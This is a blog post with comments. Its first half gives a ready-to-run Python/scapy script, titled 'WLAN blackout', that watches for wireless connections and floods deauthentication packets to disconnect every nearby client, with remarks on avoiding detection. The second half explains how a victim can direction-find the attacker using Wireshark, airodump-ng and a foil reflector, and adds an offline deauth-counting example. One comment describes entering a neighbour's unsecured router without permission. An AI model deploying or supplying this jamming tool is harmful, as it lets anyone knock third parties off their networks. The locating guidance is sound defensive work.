How to burn down any wireless network around you and how to find out the exact location of a wireless laptop

I made a program which monitors the air for connections between wireless hot spots and hosts. If the program finds a connection, it sends a deauth packet which disconnects the client. This happens at such a high speed that clients have no chance to establish a proper connection to the router.

Here is the code:
[python]
#!/usr/bin/python
try:
import sys,os
from scapy.all import *
except:
print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed"
sys.exit(0)

def deauth_flood(p):
if p.haslayer(Dot11):
mac = {}
mac["ap"]=p.sprintf("%Dot11.addr1%")
mac["station1"]=p.sprintf("%Dot11.addr2%")
if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None":
os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate.
def instructions():
print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n"
print "python "+sys.argv[0]+" [iface]"
print "python "+sys.argv[0]+" mon0"

if len(sys.argv)>1:
print "[+] Searching for packets..."
sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood))
else:
sys.exit(instructions())
[/python]

Use at your own risk. You won't be detected too fast, since you send entirely spoofed packets, but with the right equipment and skills the victim will be able to do it. Normally, when these kinds of attacks are launched at companies, they will have to ask the ISP to come with a special device which will track down the exact location of the device.

But what if you are being targeted by this attack?

First you have to know that this might be hard to detect, since it can be launched from many different kinds of locations. Think about:
- An attacker at one location not too far away, for example in a car
- A moving attacker walking around with a laptop in a bag
- Infected/botted computer(s) of any kind; this could even be your heat pump or the control system of your lighting
- Malicious pineapples
- Phones (like the iPhone)
- A satellite dish pointed at you
- An infected satellite

Understand that it is impossible to counter some of these attacks, but an iPhone or a car should be traceable.

Requirements:
- Movable Linux-based PC with wireless capability; if you don't have a *nix system you can download BackTrack for free, burn it to a DVD and boot from it. If your PC can't boot from DVDs, you can go for an Ubuntu live CD or another distribution. Booting from these CDs won't change anything on your actual system.
- Wireshark (free)
- Aircrack-ng (free)
Optional:
- pointable antenna
- thin foil
- scissors
- glue
- cardboard (or other hard bendable material)

Why thin foil, scissors and cardboard? To locate the attacker: it would be ideal to have a parabolic reflector to decrease the time it takes to locate the attacker.
You can make the windsurfer or be creative and make something custom. The idea is that you eliminate one side of the antenna and reflect it to the side you point at, which increases your range and eliminates the chance of the attacker being behind the antenna.

When you have all the requirements you can get started: move into the middle of the deauth packet storm and start Wireshark and airodump-ng.
In Wireshark, apply "radiotap.length==13" as a filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng.
Look at the rate at which you capture deauth packets, look in the bottom fields for the connections between routers and hosts, and look at the PWR levels there.
Now turn the windsurfer 90 degrees and look at the rate at which you capture the deauth packets now; decide whether it is lower or higher. Repeat this process until you find the direction in which the deauth packets have the highest rate. When you are in a building, it would be smart to also look below and above you.
Once you have found the direction from which the most deauth packets came, move your PC closer to that source, then repeat the process of monitoring where the packets come from and look at aircrack-ng.
Once you are very, very close you can determine which MAC address is doing this by looking it up in airodump-ng; this machine will at that moment have a very low PWR (0 to -50 is good enough).
Now run this command in bash to determine the manufacturer of the card, so you know something more about the attacking machine.
cat `locate manuf` | grep 00:11:22
Replace the last part with the first part of the MAC address; for example, when you found the MAC address 55:44:33:22:11:00, then 55:44:33 is the part you need.
Please note that this MAC address can be spoofed and/or may not be broadcasting, so you won't be able to see it. In that case you have to do it all with Wireshark and determine where the most packets come from.
After you have done all this you can just grab that malicious pineapple and smash it as hard as you can.
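The survey procedure above as offline analysis, in an added example that is not part of the original post: it counts deauthentication frames per antenna bearing and reports the bearing with the highest rate. Frames are matched by 802.11 type/subtype (management, subtype 12; in Wireshark, `wlan.fc.type_subtype == 12`), which does not depend on the radiotap header length the capturing adapter produces. The function names, the 5 frames/s flood threshold and all sample frames are assumptions constructed for illustration.

```python
import struct
from collections import Counter

def mac(b):
    return ":".join("%02x" % x for x in b)

def parse_deauth(raw):
    """Return (dst, src, bssid, reason) for a radiotap+802.11 deauth frame, else None."""
    if len(raw) < 4:
        return None
    rt_len = struct.unpack_from("<H", raw, 2)[0]  # radiotap length field (little-endian)
    d = raw[rt_len:]
    if len(d) < 26:                               # 24-byte header + 2-byte reason code
        return None
    ftype, subtype = (d[0] >> 2) & 0x3, (d[0] >> 4) & 0xF
    if (ftype, subtype) != (0, 12):               # management frame, subtype 12 = deauth
        return None
    return mac(d[4:10]), mac(d[10:16]), mac(d[16:22]), struct.unpack_from("<H", d, 24)[0]

def survey(captures, flood_rate=5.0):
    """captures: {bearing_deg: (seconds_listened, [raw frames])}.
    Returns (deauth frames/s per bearing, strongest bearing or None, claimed senders)."""
    rates, senders = {}, Counter()
    for bearing, (seconds, frames) in captures.items():
        hits = [h for h in map(parse_deauth, frames) if h]
        rates[bearing] = len(hits) / seconds
        senders.update(h[1] for h in hits)        # addr2 is spoofable: a hint, not proof
    best = max(rates, key=rates.get)
    return rates, (best if rates[best] >= flood_rate else None), senders

# --- constructed sample data (not a real capture) ---
def sample(subtype, rt_len=8):
    # Minimal radiotap header; extra zero bytes stand in for driver-specific fields.
    radiotap = struct.pack("<BBHI", 0, 0, rt_len, 0) + b"\x00" * (rt_len - 8)
    sta, ap = bytes.fromhex("020000000001"), bytes.fromhex("0200000000aa")
    return radiotap + bytes([subtype << 4, 0]) + b"\x00\x00" + sta + ap + ap + b"\x00\x00" + b"\x07\x00"

DEAUTH, BEACON = sample(12), sample(8)
CAPTURES = {                                      # 10 s listened per antenna bearing
    0:   (10.0, [DEAUTH] * 20 + [BEACON] * 50),
    90:  (10.0, [DEAUTH] * 180 + [BEACON] * 50),
    180: (10.0, [DEAUTH] * 35 + [sample(12, rt_len=13)] * 5),
    270: (10.0, [BEACON] * 50),
}

if __name__ == "__main__":
    rates, bearing, senders = survey(CAPTURES)
    print(rates, bearing, senders.most_common(1))
```

Because the sender address is taken from the frame itself, the per-bearing rate is the reliable signal here; the address count only tells you which identity the flood is claiming.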

Hello, I am Jelmer born in 1991 and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.

14 Comments

  3. cna training says:

    Great information! I’ve been looking for something like this for a while now. Thanks!

  4. quido says:

    This might be interesting with a GPS device? For better locating the user with a small amount of time.
    http://bit.ly/adNZbg

    Nice article like always;)

  6. motercalo says:

    Have you got more news like that ?

  7. Angus says:

    How would a GPS help? It just tells you where you are, when what you really need to know is where the other guy is relative to you.

  8. cna training says:

    nice post. thanks.

  9. nursing schools says:

    this post is very useful thx!

  10. educational grants says:

    this post is very useful thx!

  11. Name (required) says:

    Fuck you this shit is weak

  12. Mathias Karlsson says:

    #8
    Care to elaborate?

  13. KIAaze says:

    Do you have to set the wireless interface to monitor mode or something like that first?
    Does the machine running wireshark have to be connected to a wireless access point first or not?

    I'm trying to check for deauth packets now (because my wireless keeps disconnecting/failing to connect), but wireshark doesn't see anything at all, even without the filter. :(

  14. Nathan says:

    I have about 20 access points around me and don't have the option of a wired connection. There is so much channel pollution, and it sometimes affects my video playback and game play. I was trying to find a nice way to change someone's channel, but you can't do that without access to their GUI or maybe another way? Everyone is running I think WPA or WPA2, there was 1 unsecured linksys I accessed and changed the channel to the opposite side of me. It's getting old though, the interference. I don't care about being nice anymore, I want to forcibly drop the networks on my channel somehow, or use my spare linksys access point to screw with them. Email me if you got any information nah96@hotmail.com
